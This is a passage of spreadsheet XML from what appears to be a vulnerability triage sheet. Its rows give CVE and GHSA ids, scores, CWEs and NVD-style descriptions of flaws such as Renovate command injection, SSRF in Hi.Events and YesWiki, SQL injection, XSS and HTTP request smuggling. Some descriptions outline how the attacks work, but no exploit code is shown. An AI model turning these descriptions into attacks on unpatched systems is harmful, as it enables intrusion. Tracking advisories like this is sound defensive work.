          <t>CWE-77</t>
        </is>
      </c>
      <c r="R581" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 32.135.0 before 40.33.0 contain a command injection vulnerability in the hermit manager where user-provided dependency names are appended to install and uninstall commands without proper sanitization. Attackers with repository write access can provide maliciously named hermit dependencies to execute arbitrary commands on the machine running Renovate.</t>
        </is>
      </c>
      <c r="S581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76231</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76232</t>
        </is>
      </c>
      <c r="D582" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E582" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F582" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I582" s="5" t="inlineStr"/>
      <c r="J582" s="5" t="inlineStr"/>
      <c r="K582" s="5" t="inlineStr"/>
      <c r="L582" s="5" t="inlineStr"/>
      <c r="M582" s="5" t="inlineStr"/>
      <c r="N582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O582" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P582" s="5" t="inlineStr"/>
      <c r="Q582" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R582" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 31.51.0 before 40.33.0 contain a command injection vulnerability in the helmv3 manager where the repository parameter is appended to helm registry login commands without proper sanitization. Attackers with repository write access can craft malicious Chart.yaml files to execute arbitrary commands on the machine running Renovate.</t>
        </is>
      </c>
      <c r="S582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76232</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76233</t>
        </is>
      </c>
      <c r="D583" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E583" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F583" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I583" s="5" t="inlineStr"/>
      <c r="J583" s="5" t="inlineStr"/>
      <c r="K583" s="5" t="inlineStr"/>
      <c r="L583" s="5" t="inlineStr"/>
      <c r="M583" s="5" t="inlineStr"/>
      <c r="N583" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O583" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P583" s="5" t="inlineStr"/>
      <c r="Q583" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R583" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 39.53.0 before 40.33.0 contain a command injection vulnerability in the gleam manager where the depName parameter is appended to gleam deps update commands without proper sanitization. Attackers with repository write access can craft malicious gleam.toml files to execute arbitrary commands on the machine running Renovate.</t>
        </is>
      </c>
      <c r="S583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76233</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76838</t>
        </is>
      </c>
      <c r="D584" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E584" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F584" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I584" s="5" t="inlineStr"/>
      <c r="J584" s="5" t="inlineStr"/>
      <c r="K584" s="5" t="inlineStr"/>
      <c r="L584" s="5" t="inlineStr"/>
      <c r="M584" s="5" t="inlineStr"/>
      <c r="N584" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O584" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P584" s="5" t="inlineStr"/>
      <c r="Q584" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R584" s="5" t="inlineStr">
        <is>
          <t>Hi.Events validates a webhook destination only when it is registered, never when it is used. NoInternalUrlRule in backend/app/Validators/Rules/NoInternalUrlRule.php resolves the hostname with gethostbyname() and rejects private and reserved ranges, which any public hostname passes. At dispatch, WebhookDispatchService takes the stored URL and calls it through spatie/laravel-webhook-server without repeating the check, and backend/config/webhook-server.php sets no Guzzle options, so redirect following remains enabled by default. A destination that answers with a redirect to a loopback, private or cloud metadata address therefore causes the server to issue that request, and changing the hostname's DNS record after registration reaches the same result because no resolution is repeated. The response is not discarded: WebhookResponseHandlerService stores the body on the webhook log and WebhookLogResource returns it from the webhook logs endpoint, so the requester reads what the internal service replied rather than inferring it. Both event and organizer webhooks share the rule and the dispatch path. Version 1.11.1-beta revalidates at dispatch, pins the validated address, checks every redirect hop, and decodes IPv6 transition addresses that previously bypassed the filter.</t>
        </is>
      </c>
      <c r="S584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76838</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77827</t>
        </is>
      </c>
      <c r="D585" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E585" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F585" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G585" s="5" t="inlineStr"/>
      <c r="H585" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I585" s="5" t="inlineStr"/>
      <c r="J585" s="5" t="inlineStr"/>
      <c r="K585" s="5" t="inlineStr"/>
      <c r="L585" s="5" t="inlineStr"/>
      <c r="M585" s="5" t="inlineStr"/>
      <c r="N585" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O585" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P585" s="5" t="inlineStr"/>
      <c r="Q585" s="5" t="inlineStr">
        <is>
          <t>CWE-428</t>
        </is>
      </c>
      <c r="R585" s="5" t="inlineStr">
        <is>
          <t>Maono Link 3.8.13 MaonoAiServices Windows service allows local privilege escalation for a standard user account via improper write privileges in 'C:\ProgramData\Maono'. Fixed in 4.0.80.</t>
        </is>
      </c>
      <c r="S585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77827</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85613</t>
        </is>
      </c>
      <c r="D586" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E586" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F586" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G586" s="5" t="inlineStr"/>
      <c r="H586" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I586" s="5" t="inlineStr"/>
      <c r="J586" s="5" t="inlineStr"/>
      <c r="K586" s="5" t="inlineStr"/>
      <c r="L586" s="5" t="inlineStr"/>
      <c r="M586" s="5" t="inlineStr"/>
      <c r="N586" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O586" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P586" s="5" t="inlineStr"/>
      <c r="Q586" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R586" s="5" t="inlineStr">
        <is>
          <t>OpenPanel before 2.3.0 contains a cross-site scripting vulnerability in the unauthenticated favicon proxy endpoint GET /misc/favicon that allows remote attackers to execute scripts by supplying an SVG file URL. Attackers can host malicious SVG files with embedded scripts that execute in the victim's browser on the API origin, enabling same-origin credentialed requests to authenticated endpoints.</t>
        </is>
      </c>
      <c r="S586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85613</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86819</t>
        </is>
      </c>
      <c r="D587" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E587" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F587" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G587" s="5" t="inlineStr"/>
      <c r="H587" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I587" s="5" t="inlineStr"/>
      <c r="J587" s="5" t="inlineStr"/>
      <c r="K587" s="5" t="inlineStr"/>
      <c r="L587" s="5" t="inlineStr"/>
      <c r="M587" s="5" t="inlineStr"/>
      <c r="N587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O587" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P587" s="5" t="inlineStr"/>
      <c r="Q587" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R587" s="5" t="inlineStr">
        <is>
          <t>Waves Central for macOS contains a local privilege escalation in the privileged helper service. The helper authorizes connecting XPC clients by comparing the caller's code-signing certificate chain for equality with its own, rather than validating the caller against a pinned code requirement (application identifier and Team ID). A local, authenticated user can execute code within the vendor-signed process, satisfy the helper's client check, and cause the helper to execute a script with root privileges. Fixed in 17.0.</t>
        </is>
      </c>
      <c r="S587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86819</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C588" s="5" t="inlineStr">
        <is>
          <t>GHSA-3vrx-526r-64rm</t>
        </is>
      </c>
      <c r="D588" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E588" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F588" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G588" s="5" t="inlineStr"/>
      <c r="H588" s="5" t="inlineStr"/>
      <c r="I588" s="5" t="inlineStr"/>
      <c r="J588" s="5" t="inlineStr"/>
      <c r="K588" s="5" t="inlineStr"/>
      <c r="L588" s="5" t="inlineStr">
        <is>
          <t>pip:gitpython</t>
        </is>
      </c>
      <c r="M588" s="5" t="inlineStr"/>
      <c r="N588" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O588" s="5" t="inlineStr"/>
      <c r="P588" s="5" t="inlineStr"/>
      <c r="Q588" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R588" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-hmq2-w58f-27jc. This link is maintained to preserve external references.
## Original Description
GitPython before 3.1.58 fails to validate submodule names from .gitmodules files, allowing attackers to create Git repositories at arbitrary filesystem paths outside the intended clone directory. Attackers can craft malicious repositories with traversal sequences in submodule names that GitPython processes during submodule initialization, creating attacker-controlled Git repositories at escaped filesystem locations.</t>
        </is>
      </c>
      <c r="S588" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-3vrx-526r-64rm</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19203</t>
        </is>
      </c>
      <c r="D589" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E589" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F589" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G589" s="5" t="inlineStr"/>
      <c r="H589" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I589" s="5" t="inlineStr"/>
      <c r="J589" s="5" t="inlineStr"/>
      <c r="K589" s="5" t="inlineStr"/>
      <c r="L589" s="5" t="inlineStr"/>
      <c r="M589" s="5" t="inlineStr"/>
      <c r="N589" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O589" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P589" s="5" t="inlineStr"/>
      <c r="Q589" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R589" s="5" t="inlineStr">
        <is>
          <t>A client may issue specially crafted HTTP/1.1 chunked requests to a Jetty server that cause Jetty and an intermediary proxy to interpret different request boundaries, potentially resulting in HTTP request smuggling.
This is caused by Jetty accepting a lone LF character as a terminator in parts of chunked request parsing. Depending on the Jetty version and configured HTTP compliance mode, this may occur in chunk extensions, chunk data termination, or trailer termination.</t>
        </is>
      </c>
      <c r="S589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19203</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52769</t>
        </is>
      </c>
      <c r="D590" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E590" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F590" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G590" s="5" t="inlineStr"/>
      <c r="H590" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I590" s="5" t="inlineStr"/>
      <c r="J590" s="5" t="inlineStr"/>
      <c r="K590" s="5" t="inlineStr"/>
      <c r="L590" s="5" t="inlineStr"/>
      <c r="M590" s="5" t="inlineStr"/>
      <c r="N590" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O590" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P590" s="5" t="inlineStr"/>
      <c r="Q590" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R590" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. From version 4.6.2 to before version 4.6.6, the POST /api/forms/{formId}/actor/inbox route - exposed publicly with acl:"public" - accepts an HTTP Signature header whose keyId parameter is a URL. HttpSignatureService::verifySignature() parses the header and immediately makes a server-side HTTP GET to that URL, before any cryptographic verification or URL validation. An unauthenticated remote attacker can therefore make YesWiki issue arbitrary outbound HTTP requests to any host the server can reach - internal services, cloud-metadata endpoints (169.254.169.254), intranet-only admin panels, etc. - and read enough back via timing and error-message oracles to scan ports, enumerate services, and (on a real cloud instance) reach IAM metadata. The only deployment-side precondition is that ActivityPub be enabled on at least one Bazar form. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="S590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52769</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52771</t>
        </is>
      </c>
      <c r="D591" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E591" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F591" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G591" s="5" t="inlineStr"/>
      <c r="H591" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I591" s="5" t="inlineStr"/>
      <c r="J591" s="5" t="inlineStr"/>
      <c r="K591" s="5" t="inlineStr"/>
      <c r="L591" s="5" t="inlineStr"/>
      <c r="M591" s="5" t="inlineStr"/>
      <c r="N591" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O591" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P591" s="5" t="inlineStr"/>
      <c r="Q591" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R591" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. From version 4.2.0 to before version 4.6.6, ApiController::deletePage() interpolates a page tag retrieved from the database into a DELETE FROM …_links WHERE to_tag = '$tag' query without escaping. The page tag is attacker-controlled — the POST /api/pages/{tag} API accepts arbitrary URL-encoded values, including single quotes, and stores them. A low-privilege authenticated user can therefore create a page whose tag is a SQL fragment, make the page non-orphaned via the standard {{include page="…"}} link mechanism, and then invoke the delete endpoint to execute arbitrary SQL inside the wiki database - including time-based blind data exfiltration from any table. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="S591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52771</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66357</t>
        </is>
      </c>
      <c r="D592" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E592" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F592" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G592" s="5" t="inlineStr"/>
      <c r="H592" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I592" s="5" t="inlineStr"/>
      <c r="J592" s="5" t="inlineStr"/>
      <c r="K592" s="5" t="inlineStr"/>
      <c r="L592" s="5" t="inlineStr"/>
      <c r="M592" s="5" t="inlineStr"/>
      <c r="N592" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O592" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P592" s="5" t="inlineStr"/>
      <c r="Q592" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R592" s="5" t="inlineStr">
        <is>
          <t>httpd has never implemented obs-fold (RFC 2616 §2.2 / RFC 7230 §3.2.4 header continuation lines). Every CRLF followed by a non-CRLF octet unconditionally starts a new header. This missing feature became a security concern as the understanding of HTTP request smuggling attacks evolved.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592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66357</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69646</t>
        </is>
      </c>
      <c r="D593" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E593" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F593" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G593" s="5" t="inlineStr"/>
      <c r="H593" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I593" s="5" t="inlineStr"/>
      <c r="J593" s="5" t="inlineStr"/>
      <c r="K593" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L593" s="5" t="inlineStr"/>
      <c r="M593" s="5" t="inlineStr"/>
      <c r="N593" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O593" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P593" s="5" t="inlineStr"/>
      <c r="Q593" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R593" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Skype for Business allows an unauthorized attacker to perform spoofing over an adjacent network.</t>
        </is>
      </c>
      <c r="S593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69646</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73276</t>
        </is>
      </c>
      <c r="D594" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E594" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F594" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G594" s="5" t="inlineStr"/>
      <c r="H594" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I594" s="5" t="inlineStr"/>
      <c r="J594" s="5" t="inlineStr"/>
      <c r="K594" s="5" t="inlineStr"/>
      <c r="L594" s="5" t="inlineStr"/>
      <c r="M594" s="5" t="inlineStr"/>
      <c r="N594" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O594" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P594" s="5" t="inlineStr"/>
      <c r="Q594" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R594" s="5" t="inlineStr">
        <is>
          <t>Gracefulness code ignored cases that should be rejected, resulting in possible HTTP Request Smuggling opportunities.
This issue affects OTP from OTP 22.2 before OTP 27.3.4.17, from OTP 28.0 before OTP 28.5.0.6, and from OTP 29.0 before OTP 29.0.6, corresponding to inets from 7.1.2 before 9.3.2.7, from 9.4 before 9.6.2.3, and from 9.7 before 9.7.2.</t>
        </is>
      </c>
      <c r="S594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73276</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73812</t>
        </is>
      </c>
      <c r="D595" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E595" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F595" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G595" s="5" t="inlineStr"/>
      <c r="H595" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I595" s="5" t="inlineStr"/>
      <c r="J595" s="5" t="inlineStr"/>
      <c r="K595" s="5" t="inlineStr"/>
      <c r="L595" s="5" t="inlineStr"/>
      <c r="M595" s="5" t="inlineStr"/>
      <c r="N595" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O595" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P595" s="5" t="inlineStr"/>
      <c r="Q595" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R595" s="5" t="inlineStr">
        <is>
          <t>httpd function check_header/3 rejects duplicate Content-Length (per CVE-2026-23941) but never checks for the TE+CL co-presence that RFC 9112 §6.3 identifies as a probable smuggling attempt. handle_body/3 frames by chunked and silently discards Content-Length. A CL-preferring front-end paired with chunked-preferring inets creates a classic CL.TE front-end/back-end desync.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595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73812</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76225</t>
        </is>
      </c>
      <c r="D596" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E596" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F596" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G596" s="5" t="inlineStr"/>
      <c r="H596" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I596" s="5" t="inlineStr"/>
      <c r="J596" s="5" t="inlineStr"/>
      <c r="K596" s="5" t="inlineStr"/>
      <c r="L596" s="5" t="inlineStr"/>
      <c r="M596" s="5" t="inlineStr"/>
      <c r="N596" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O596" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P596" s="5" t="inlineStr"/>
      <c r="Q596" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R596" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.8.1 contains a server-side request forgery vulnerability in the OpenCypher LOAD CSV implementation that fails to validate HTTP/HTTPS URLs. Authenticated attackers can craft LOAD CSV queries pointing to internal network addresses or cloud metadata endpoints to make the ArcadeDB server fetch and return sensitive data from restricted services.</t>
        </is>
      </c>
      <c r="S596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76225</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81821</t>
        </is>
      </c>
      <c r="D597" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E597" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F597" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G597" s="5" t="inlineStr"/>
      <c r="H597" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I597" s="5" t="inlineStr"/>
      <c r="J597" s="5" t="inlineStr"/>
      <c r="K597" s="5" t="inlineStr"/>
      <c r="L597" s="5" t="inlineStr"/>
      <c r="M597" s="5" t="inlineStr"/>
      <c r="N597" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O597" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P597" s="5" t="inlineStr"/>
      <c r="Q597" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="R597" s="5" t="inlineStr">
        <is>
